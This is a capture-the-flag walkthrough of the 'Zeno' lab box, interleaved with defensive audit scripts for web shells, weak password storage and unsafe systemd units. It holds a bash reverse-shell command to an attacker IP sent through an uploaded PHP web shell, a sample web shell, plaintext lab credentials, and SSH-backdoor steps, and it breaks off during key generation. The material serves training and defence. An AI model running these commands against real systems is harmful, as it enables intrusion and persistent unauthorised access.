Zeno
Do you have the same patience as the great stoic philosopher Zeno? Try it out!
Initial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC -v zeno.thm
Not shown: 973 filtered tcp ports (no-response), 26 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
The Nmap scan shows that 26 of the 1000 most common ports are filtered, which hints at a firewall, or simply that we have not scanned every port yet.
To be sure, we rescan with a faster tool, RustScan.
┌──(kali㉿kali)-[~]
└─$ rustscan -a zeno.thm
Open 10.201.83.24:22
Open 10.201.83.24:12340
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 22,12340 -sV -sC -v zeno.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
12340/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: We've got some trouble | 404 - Resource not found
| http-methods:
| Supported Methods: POST OPTIONS GET HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
Besides SSH, the results reveal an HTTP service on an uncommon port, served by Apache 2.4.6.
HTTP 12340

Subdomain Enumeration
First, we try to enumerate subdomains with ffuf, but get no results.
ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.201.83.24:12340/ -H "Host: FUZZ.zeno.thm" -mc 200 -fw 120
Directory Enumeration
Next, we scan the website for hidden content.
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://zeno.thm:12340/FUZZ -r -fc 403 -e .php,.txt
The scan discovers a /rms directory.
/rms
Most likely, rms here stands for Restaurant Management System.

/rms Directory Enumeration
We continue by scanning the contents of the /rms directory.
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://zeno.thm:12340/rms/FUZZ -r -fc 403 -e .php,.txt
We find many .php files, but most of them redirect to access-denied.php because we are not authenticated.
/rms/access-denied.php

/rms/aboutus.php

/rms/admin
Visiting /rms/admin/login-form.php, we find the admin login page.

This login page has no rate limiting. We try a few default credentials, without success:
admin:admin
admin:password
admin:ADMIN
Remote Code Execution
Using searchsploit, we find that this system has a known RCE vulnerability.


The exploit uploads a web shell to the server under the name reverse-shell.php.

Through the web shell, we can execute commands as the apache user.
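From the defender's side, the upload that lands reverse-shell.php in /rms/images only works because that directory is writable by the web server (the listing further down shows images owned by apache) and because Apache still executes PHP there. The following is an added example for this writeup, not code from the room or the RMS application: a small scanner that walks an upload directory and reports any file carrying PHP code, with a separate severity for files that hand request input straight to a command-execution function. The sample files it inspects are constructed in a temporary directory.

```python
import os
import re
import tempfile

# PHP functions that execute commands or code, and request superglobals that an
# uploaded shell typically reads its command from. Illustrative, not exhaustive.
EXEC_FUNCS = r"(system|exec|shell_exec|passthru|popen|proc_open|eval)"
REQUEST_INPUT = r"\$_(GET|POST|REQUEST|COOKIE)\s*\["
WEBSHELL_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*" + REQUEST_INPUT)
PHP_TAG_RE = re.compile(r"<\?(php|=)")
PHP_EXTENSIONS = {".php", ".phtml", ".phar", ".php5"}


def scan_upload_dir(root: str) -> list:
    """Walk an upload directory (images/, uploads/ ...) and report files that
    should never be there. Severity, highest first:
      webshell               - request input wired into command execution
      php-code-in-upload-dir - a PHP open tag, whatever the file extension
      php-extension          - a PHP-handled extension with no visible code
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    # First 64 KiB is enough for a dropped shell; latin-1 never fails.
                    data = fh.read(65536).decode("latin-1")
            except OSError:
                continue
            ext = os.path.splitext(name)[1].lower()
            kind = None
            if WEBSHELL_RE.search(data):
                kind = "webshell"
            elif PHP_TAG_RE.search(data):
                kind = "php-code-in-upload-dir"
            elif ext in PHP_EXTENSIONS:
                kind = "php-extension"
            if kind:
                findings.append({"path": os.path.relpath(path, root), "type": kind})
    return sorted(findings, key=lambda f: f["path"])


def demo() -> list:
    """Constructed sample upload directory: a genuine image, a shell named like
    the one in this writeup, and PHP code hiding behind an image extension."""
    root = tempfile.mkdtemp(prefix="images-")
    samples = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "reverse-shell.php": b"<?php system($_GET['cmd']); ?>",
        "photo.jpg": b"<?php echo 'not an image'; ?>",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return scan_upload_dir(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['type']:24} {finding['path']}")
```

The scan is the detection half; the hardening half is to make the finding harmless even if a file does get in: keep the upload directory owned by a user other than the one Apache runs as, and disable PHP execution under it (for mod_php, a Directory block with php_admin_flag engine off, or simply removing the .php handler for that path) so an uploaded file is served as bytes instead of being run.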
Shell as apache
Next, we use a payload to establish a reverse shell connection:
/bin/bash -i >& /dev/tcp/10.17.21.52/4242 0>&1
->
http://zeno.thm:12340/rms/images/reverse-shell.php?cmd=%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.17.21.52%2F4242%200%3E%261
Once inside the system, we look for user.txt, but we cannot read it because the file is only readable by the user edward.
bash-4.2$ cd /home
cd /home
bash-4.2$ ls -la
ls -la
total 0
drwxr-xr-x. 3 root root 20 Jul 26 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
drwxr-xr-x. 3 root root 127 Sep 21 2021 edward
bash-4.2$ cd edward
cd edward
bash-4.2$ ls -la
ls -la
total 20
drwxr-xr-x. 3 root root 127 Sep 21 2021 .
drwxr-xr-x. 3 root root 20 Jul 26 2021 ..
lrwxrwxrwx. 1 root root 9 Jul 26 2021 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 root root 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 root root 231 Apr 1 2020 .bashrc
drwxr-xr-x. 2 root root 29 Sep 21 2021 .ssh
-rw-------. 1 root root 699 Jul 26 2021 .viminfo
-rw-r-----. 1 root edward 38 Jul 26 2021 user.txt
bash-4.2$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
Sudo Permissions
bash-4.2$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache:
We check the sudo permissions, but running sudo -l prompts for a password, so we learn nothing here.
Secret Share Discovery
bash-4.2$ cd /
cd /
bash-4.2$ ls -la
ls -la
total 16
dr-xr-xr-x. 17 root root 224 Jun 8 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
lrwxrwxrwx. 1 root root 7 Jun 8 2021 bin -> usr/bin
dr-xr-xr-x. 5 root root 4096 Sep 23 2021 boot
drwxr-xr-x. 17 root root 2960 Aug 21 06:25 dev
drwxr-xr-x. 78 root root 8192 Aug 21 06:25 etc
drwxr-xr-x. 3 root root 20 Jul 26 2021 home
lrwxrwxrwx. 1 root root 7 Jun 8 2021 lib -> usr/lib
lrwxrwxrwx. 1 root root 9 Jun 8 2021 lib64 -> usr/lib64
drwxr-xr-x. 2 root root 6 Apr 11 2018 media
drwxr-xr-x. 3 root root 26 Sep 21 2021 mnt
drwxr-xr-x. 2 root root 6 Apr 11 2018 opt
dr-xr-xr-x. 142 root root 0 Aug 21 06:25 proc
dr-xr-x---. 3 root root 274 Sep 21 2021 root
drwxr-xr-x. 26 root root 760 Aug 21 06:25 run
lrwxrwxrwx. 1 root root 8 Jun 8 2021 sbin -> usr/sbin
drwxr-xr-x. 2 root root 6 Jul 26 2021 srv
dr-xr-xr-x. 13 root root 0 Aug 21 06:25 sys
drwxrwxrwt. 2 root root 15 Aug 21 08:57 tmp
drwxr-xr-x. 13 root root 155 Jun 8 2021 usr
drwxr-xr-x. 20 root root 278 Jul 26 2021 var
bash-4.2$ ls -la /tmp
ls -la /tmp
total 0
drwxrwxrwt. 2 root root 15 Aug 21 08:57 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
prw-r--r--. 1 apache apache 0 Aug 21 08:57 f
bash-4.2$ ls -la opt
ls -la opt
total 0
drwxr-xr-x. 2 root root 6 Apr 11 2018 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
bash-4.2$ ls -la mnt
ls -la mnt
total 0
drwxr-xr-x. 3 root root 26 Sep 21 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
drwxr-xr-x. 2 edward edward 6 Sep 21 2021 secret-share
bash-4.2$ cd mnt
cd mnt
bash-4.2$ cd secret-share
cd secret-share
bash-4.2$ ls -la
ls -la
total 0
drwxr-xr-x. 2 edward edward 6 Sep 21 2021 .
drwxr-xr-x. 3 root root 26 Sep 21 2021 ..
Continuing the enumeration, we find a secret-share directory under /mnt, but it is empty.
Database Credentials Discovery
bash-4.2$ cd /var/www/html
cd /var/www/html
bash-4.2$ ls -la
ls -la
total 8
drwxr-xr-x. 3 root root 35 Jul 26 2021 .
drwxr-xr-x. 3 root root 18 Jul 26 2021 ..
-rw-r--r--. 1 root root 3897 Jul 26 2021 index.html
drwxr-xr-x. 10 root root 4096 Jul 26 2021 rms
bash-4.2$ cd rms
cd rms
bash-4.2$ ls -la
ls -la
total 208
drwxr-xr-x. 10 root root 4096 Jul 26 2021 .
drwxr-xr-x. 3 root root 35 Jul 26 2021 ..
-rw-r--r--. 1 root root 1888 Dec 8 2020 aboutus.php
-rw-r--r--. 1 root root 1312 Aug 9 2017 access-denied.php
drwxr-xr-x. 7 root root 4096 Jul 26 2021 admin
-rw-r--r--. 1 root root 289 Nov 17 2017 auth.php
-rw-r--r--. 1 root root 2960 Aug 9 2017 billing-alternative.php
-rw-r--r--. 1 root root 1395 Jul 26 2021 billing-exec.php
-rw-r--r--. 1 root root 1267 Dec 8 2020 billing-success.php
-rw-r--r--. 1 root root 1373 Nov 17 2017 booked.php
-rw-r--r--. 1 root root 2697 Dec 8 2020 cart-exec.php
-rw-r--r--. 1 root root 8899 Dec 8 2020 cart.php
drwxr-xr-x. 2 root root 24 Jul 26 2021 connection
-rw-r--r--. 1 root root 1664 Nov 17 2017 contactus.php
drwxr-xr-x. 2 root root 230 Dec 8 2020 css
-rw-r--r--. 1 root root 748 Dec 8 2020 delete-order.php
drwxr-xr-x. 2 root root 209 Dec 8 2020 fonts
-rw-r--r--. 1 root root 6490 Dec 8 2020 foodzone.php
-rw-r--r--. 1 root root 450 Aug 9 2017 footer.php
-rw-r--r--. 1 root root 1016 Aug 9 2017 gallery.php
drwxr-xr-x. 2 apache apache 4096 Aug 21 08:55 images
-rw-r--r--. 1 root root 3195 Jul 26 2021 inbox.php
-rw-r--r--. 1 root root 6993 Jul 26 2021 index.php
-rw-r--r--. 1 root root 1531 Dec 8 2020 login-exec.php
-rw-r--r--. 1 root root 1310 Dec 8 2020 login-failed.php
-rw-r--r--. 1 root root 6587 Dec 8 2020 login-register.php
-rw-r--r--. 1 root root 1759 Aug 1 2017 logout.php
-rw-r--r--. 1 root root 5108 Dec 8 2020 member-index.php
-rw-r--r--. 1 root root 5297 Dec 8 2020 member-profile.php
-rw-r--r--. 1 root root 3017 Dec 8 2020 order-exec.php
-rw-r--r--. 1 root root 3945 Dec 8 2020 partyhalls.php
-rw-r--r--. 1 root root 5898 Dec 8 2020 password-reset.php
-rw-r--r--. 1 root root 1845 Dec 8 2020 ratings-exec.php
-rw-r--r--. 1 root root 1340 Dec 8 2020 ratings-failed.php
-rw-r--r--. 1 root root 1261 Dec 8 2020 ratings-success.php
-rw-r--r--. 1 root root 4490 Dec 8 2020 ratings.php
-rw-r--r--. 1 root root 1881 Dec 8 2020 register-exec.php
-rw-r--r--. 1 root root 1523 Dec 8 2020 register-failed.php
-rw-r--r--. 1 root root 1213 Dec 8 2020 register-success.php
-rw-r--r--. 1 root root 3070 Dec 8 2020 reserve-exec.php
-rw-r--r--. 1 root root 1322 Dec 8 2020 reserve-success.php
-rw-r--r--. 1 root root 1361 Dec 8 2020 reset-failed.php
-rw-r--r--. 1 root root 1229 Dec 8 2020 reset-success.php
-rw-r--r--. 1 root root 3411 Dec 8 2020 specialdeals.php
drwxr-xr-x. 2 root root 29 Dec 8 2020 stylesheets
drwxr-xr-x. 2 root root 65 Dec 8 2020 swf
-rw-r--r--. 1 root root 3846 Dec 8 2020 tables.php
-rw-r--r--. 1 root root 1573 Dec 8 2020 update-exec.php
-rw-r--r--. 1 root root 3466 Dec 8 2020 update-quantity.php
drwxr-xr-x. 2 root root 21 Dec 8 2020 validation
In /var/www/html/rms/connection there is a file config.php containing the database credentials for the root user.
bash-4.2$ cd connection
cd connection
bash-4.2$ ls -la
ls -la
total 8
drwxr-xr-x. 2 root root 24 Jul 26 2021 .
drwxr-xr-x. 10 root root 4096 Jul 26 2021 ..
-rw-r--r--. 1 root root 239 Jul 26 2021 config.php
bash-4.2$ cat config.php
cat config.php
<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASSWORD', 'veerUffIrangUfcubyig');
define('DB_DATABASE', 'dbrms');
define('APP_NAME', 'Pathfinder Hotel');
error_reporting(1);
?>
We continue by enumerating the database with these credentials.
bash-4.2$ mysql
mysql
ERROR 1045 (28000): Access denied for user 'apache'@'localhost' (using password: NO)
bash-4.2$ mysql -u root -p
mysql -u root -p
Enter password: veerUffIrangUfcubyig
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 29738
Server version: 5.5.68-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dbrms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
MariaDB [(none)]> use dbrms;
use dbrms;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [dbrms]> show tables;
show tables;
+----------------------+
| Tables_in_dbrms |
+----------------------+
| billing_details |
| cart_details |
| categories |
| currencies |
| food_details |
| members |
| messages |
| orders_details |
| partyhalls |
| pizza_admin |
| polls_details |
| quantities |
| questions |
| ratings |
| reservations_details |
| specials |
| staff |
| tables |
| timezones |
| users |
+----------------------+
20 rows in set (0.00 sec)
MariaDB [dbrms]> select * from users;
select * from users;
Empty set (0.00 sec)
MariaDB [dbrms]> select * from members;
select * from members;
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
| member_id | firstname | lastname | login | passwd | question_id | answer |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
| 15 | Stephen | Omolewa | omolewastephen@gmail.com | 81dc9bdb52d04dc20036dbd8313ed055 | 9 | 51977f38bb3afdf634dd8162c7a33691 |
| 16 | John | Smith | jsmith@sample.com | 1254737c076cf867dc53d60a0364f38e | 8 | 9f2780ee8346cc83b212ff038fcdb45a |
| 17 | edward | zeno | edward@zeno.com | 6f72ea079fd65aff33a67a3f3618b89c | 8 | 6f72ea079fd65aff33a67a3f3618b89c |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
3 rows in set (0.00 sec)
We find three password hashes along with the security-question answer hashes. We try to crack them with an online hash cracker:


┌──(kali㉿kali)-[~/Desktop]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-08-21 14:23) 0g/s 27583Kp/s 27583Kc/s 27583KC/s fuckyooh21..*7¡Vamos!
Session completed.
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 6f72ea079fd65aff33a67a3f3618b89c
Time.Started.....: Thu Aug 21 14:24:35 2025 (1 sec)
Time.Estimated...: Thu Aug 21 14:24:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 23774.1 kH/s (1.56ms) @ Accel:2048 Loops:1 Thr:32 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[30313032333932333936] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 46c Util: 25% Core:2010MHz Mem:8000MHz Bus:8
bash-4.2$ su edward
su edward
Password: zeno
su: Authentication failure
bash-4.2$ su edward
su edward
Password: edward
su: Authentication failure
bash-4.2$ su edward
su edward
Password:
su: Authentication failure
Still, we could not crack the password of our target user, edward.
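Two weaknesses are visible in the members table above without cracking anything: every passwd and answer value is a bare 32-hex-digit MD5 digest, so there is no salt and no work factor, and edward's security answer hashes to exactly the same value as his password. The following is an added example for this writeup, not code from the room or the RMS application: an audit over the three rows as they appear on the page that flags those two conditions plus any hash matching a small constructed list of weak values (a real audit would use a policy wordlist), beside a salted PBKDF2 hash-and-verify pair showing what the application should have stored instead. The WEAK_VALUES list and the PBKDF2 parameters are this example's own choices.

```python
import hashlib
import hmac
import os
import re

# Rows as found in the members table of dbrms above; only the audited fields are kept.
MEMBERS = [
    {"login": "omolewastephen@gmail.com",
     "passwd": "81dc9bdb52d04dc20036dbd8313ed055", "answer": "51977f38bb3afdf634dd8162c7a33691"},
    {"login": "jsmith@sample.com",
     "passwd": "1254737c076cf867dc53d60a0364f38e", "answer": "9f2780ee8346cc83b212ff038fcdb45a"},
    {"login": "edward@zeno.com",
     "passwd": "6f72ea079fd65aff33a67a3f3618b89c", "answer": "6f72ea079fd65aff33a67a3f3618b89c"},
]

MD5_RE = re.compile(r"^[0-9a-f]{32}$")
# Constructed list of weak values for the audit; a real check would use a policy wordlist.
WEAK_VALUES = ["1234", "password", "admin", "zeno", "edward"]


def audit_members(rows: list) -> dict:
    """Return {login: [issue, ...]} for each row.
    Issues: unsalted-md5, answer-equals-password, weak-password:<value>."""
    weak_by_hash = {hashlib.md5(v.encode()).hexdigest(): v for v in WEAK_VALUES}
    findings = {}
    for row in rows:
        issues = []
        if MD5_RE.match(row["passwd"]):
            issues.append("unsalted-md5")
        if row["passwd"] == row["answer"]:
            # Same digest in both columns: the recovery answer is the password itself,
            # so the "security question" adds nothing.
            issues.append("answer-equals-password")
        if row["passwd"] in weak_by_hash:
            issues.append(f"weak-password:{weak_by_hash[row['passwd']]}")
        findings[row["login"]] = issues
    return findings


def hash_password(password: str, salt: bytes = b"", iterations: int = 200_000) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256 instead of bare MD5. A fresh random salt
    per user means equal passwords no longer produce equal stored values."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _alg, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for login, issues in audit_members(MEMBERS).items():
        print(f"{login:28} {', '.join(issues) or 'ok'}")
    stored = hash_password("example-only")
    print(stored)
    print(verify_password("example-only", stored), verify_password("wrong", stored))
```

Run as is, the audit reports the first row's hash as the weak value 1234 and edward's row as both unsalted and answer-equals-password. The second pair of functions is the fix on the storage side: with a per-user salt and a high iteration count, a leaked members table no longer yields passwords to a plain wordlist run like the john and hashcat attempts above, and the answer column should be hashed the same way with its own salt.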
LinPEAS
To widen the search, we transfer LinPEAS to the target and run it to enumerate possible privilege-escalation vectors.

Locally, an SMTP service is listening on port 25 and some other service on port 9000.


The results also show that we have write access to the service file /etc/systemd/system/zeno-monitoring.service.
[edward@zeno ~]$ cd /etc/systemd/system
[edward@zeno system]$ ls -la
total 12
drwxr-xr-x. 12 root root 4096 Sep 21 2021 .
drwxr-xr-x. 4 root root 151 Jul 26 2021 ..
drwxr-xr-x. 2 root root 57 Jun 8 2021 basic.target.wants
lrwxrwxrwx. 1 root root 41 Jun 8 2021 dbus-org.fedoraproject.FirewallD1.service -> /usr/lib/systemd/system/firewalld.service
lrwxrwxrwx. 1 root root 46 Jun 8 2021 dbus-org.freedesktop.NetworkManager.service -> /usr/lib/systemd/system/NetworkManager.service
lrwxrwxrwx. 1 root root 57 Jun 8 2021 dbus-org.freedesktop.nm-dispatcher.service -> /usr/lib/systemd/system/NetworkManager-dispatcher.service
lrwxrwxrwx. 1 root root 37 Jun 8 2021 default.target -> /lib/systemd/system/multi-user.target
drwxr-xr-x. 2 root root 87 Jun 8 2021 default.target.wants
drwxr-xr-x. 2 root root 38 Jun 8 2021 dev-virtio\x2dports-org.qemu.guest_agent.0.device.wants
drwxr-xr-x. 2 root root 32 Jun 8 2021 getty.target.wants
drwxr-xr-x. 2 root root 35 Jun 8 2021 local-fs.target.wants
drwxr-xr-x. 2 root root 4096 Sep 21 2021 multi-user.target.wants
drwxr-xr-x. 2 root root 48 Jun 8 2021 network-online.target.wants
drwxr-xr-x. 2 root root 29 Jun 8 2021 sockets.target.wants
drwxr-xr-x. 2 root root 217 Jun 8 2021 sysinit.target.wants
drwxr-xr-x. 2 root root 44 Jun 8 2021 system-update.target.wants
-rw-rw-rw-. 1 root root 184 Aug 21 09:39 zeno-monitoring.service
[edward@zeno system]$ cat zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/root/zeno-monitoring.py
[Install]
WantedBy=multi-user.target
This service runs the Python script /root/zeno-monitoring.py as root whenever it is restarted or the system reboots. So if we modify the ExecStart value, we can run arbitrary commands as root.
In addition, the LinPEAS run turned up another set of credentials.
/etc/fstab:#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=FrobjoodAdkoonceanJa,domain=localdomain,soft 0 0
Since zeno is edward's last name, which we already know from the database, this is most likely his password.
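Both LinPEAS findings above, a unit file with mode rw-rw-rw- that runs as root and a CIFS password written inline in /etc/fstab, are things a host check can catch before an attacker does. The following is an added example for this writeup, not code from the room or from LinPEAS: one audit that reports unit files writable by anyone other than root, Exec lines that wrap a shell with -c, and fstab entries carrying password=, whether or not the line is commented out (the commented entry above still leaks the secret). It scans constructed copies in a temporary directory, with the page's password replaced by a placeholder; the file names and contents are this example's own.

```python
import os
import re
import stat
import tempfile

# Exec* line whose program is a shell invoked with -c (arbitrary command string).
SHELL_EXEC_RE = re.compile(
    r"^Exec(Start|StartPre|StartPost|Reload)=.*?/(ba|da|k|z)?sh\b.*\s-c\b", re.M)
# Inline password in a mount option string.
INLINE_PASSWORD_RE = re.compile(r"(?:^|,)password=", re.I)


def audit_unit_dir(unit_dir: str) -> dict:
    """Return {unit name: {"runs_as_root": bool, "issues": [...]}} for unit files
    in unit_dir. Issues: writable-by-non-root, not-owned-by-root, exec-via-shell.
    A unit that runs as root with any of these is a local root escalation path."""
    report = {}
    for name in sorted(os.listdir(unit_dir)):
        path = os.path.join(unit_dir, name)
        if os.path.islink(path) or not name.endswith((".service", ".timer", ".socket")):
            continue
        st = os.stat(path)
        issues = []
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append("writable-by-non-root")
        if st.st_uid != 0:
            issues.append("not-owned-by-root")
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        user = re.search(r"^User=(\S+)", text, re.M)
        runs_as_root = user is None or user.group(1) == "root"  # systemd default is root
        if SHELL_EXEC_RE.search(text):
            issues.append("exec-via-shell")
        report[name] = {"runs_as_root": runs_as_root, "issues": issues}
    return report


def audit_fstab(text: str) -> list:
    """Flag cifs/smb3 entries with an inline password= option. The supported fix is
    credentials=/path/to/root-only-file, which keeps the secret out of fstab."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        parts = line.lstrip("#").split()  # commented-out entries still leak the secret
        if len(parts) < 4:
            continue
        fstype, opts = parts[2], parts[3]
        if fstype in {"cifs", "smb3"} and INLINE_PASSWORD_RE.search(opts):
            findings.append({"line": lineno, "fstype": fstype,
                             "commented": line.startswith("#")})
    return findings


def demo():
    """Constructed inputs: the unit from this writeup with its world-writable mode,
    a tampered unit, a benign unit, and an fstab with the page's entry redacted."""
    unit_dir = tempfile.mkdtemp(prefix="systemd-")
    units = {
        "zeno-monitoring.service": (
            "[Unit]\nDescription=Zeno monitoring\n[Service]\nType=simple\nUser=root\n"
            "ExecStart=/root/zeno-monitoring.py\n[Install]\nWantedBy=multi-user.target\n",
            0o666),
        "tampered.service": ("[Service]\nUser=root\nExecStart=/bin/bash -c 'touch /tmp/marker'\n", 0o644),
        "good.service": ("[Service]\nUser=nobody\nExecStart=/usr/bin/true\n", 0o644),
    }
    for name, (body, mode) in units.items():
        path = os.path.join(unit_dir, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    fstab = (
        "/dev/sda1 / xfs defaults 0 0\n"
        "#//10.10.10.10/secret-share /mnt/secret-share cifs "
        "_netdev,vers=3.0,ro,username=zeno,password=REDACTED,domain=localdomain,soft 0 0\n"
        "//10.10.10.10/share /mnt/share cifs credentials=/root/.smbcreds,vers=3.0 0 0\n"
    )
    return audit_unit_dir(unit_dir), audit_fstab(fstab)


if __name__ == "__main__":
    units, fstab = demo()
    for name, info in units.items():
        print(f"{name:26} root={info['runs_as_root']} {', '.join(info['issues']) or 'ok'}")
    for f in fstab:
        print(f"fstab line {f['line']}: inline password on {f['fstype']} mount (commented={f['commented']})")
```

On this box the audit would flag zeno-monitoring.service as writable-by-non-root while running as root, which is exactly the combination the rest of the writeup uses together with the NOPASSWD reboot. The remediation is mode 0644 and root ownership on everything under /etc/systemd/system, plus moving the CIFS secret into a credentials= file readable only by root.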
Shell as edward
bash-4.2$ su edward
su edward
Password: FrobjoodAdkoonceanJa
[edward@zeno tmp]$ id
id
uid=1000(edward) gid=1000(edward) groups=1000(edward) context=system_u:system_r:httpd_t:s0
user.txt
[edward@zeno tmp]$ cd ~
cd ~
[edward@zeno ~]$ ls -la
ls -la
total 20
drwxr-xr-x. 3 root root 127 Sep 21 2021 .
drwxr-xr-x. 3 root root 20 Jul 26 2021 ..
lrwxrwxrwx. 1 root root 9 Jul 26 2021 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 root root 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 root root 231 Apr 1 2020 .bashrc
drwxr-xr-x. 2 root root 29 Sep 21 2021 .ssh
-rw-------. 1 root root 699 Jul 26 2021 .viminfo
-rw-r-----. 1 root edward 38 Jul 26 2021 user.txt
[edward@zeno ~]$ cat user.txt
cat user.txt
THM{070cab2c9dc622e5d25c0709f6cb0510}
Sudo Permissions
[edward@zeno ~]$ sudo -l
sudo -l
Matching Defaults entries for edward on zeno:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User edward may run the following commands on zeno:
(ALL) NOPASSWD: /usr/sbin/reboot
This is the right path forward: edward can use sudo to run the reboot binary, which restarts the machine and thereby launches that service.
SSH Backdoor
Because we cannot run systemctl restart to restart zeno-monitoring.service directly, the only option is to reboot the machine as root. To make things easier after the reboot, we set up an SSH backdoor for the user edward rather than having to go through apache again to reach edward.
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): key_edward
Enter passphrase for "key_edward" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key_edward
Your public key has been saved in key_edward.pub
The key fingerprint is:
SHA256:IAUhPdM4vDOZmuWr6iX+l1GlgtCPczfYDlQhgq2sIlw kali@kali
The key's randomart image is:
+--[ED25519 256]--+
| =+o*oo. |
| o +Ooo . |
|. o *B+ o |
| o EBB B |
|o .=oo* S |
|+.o .. . |
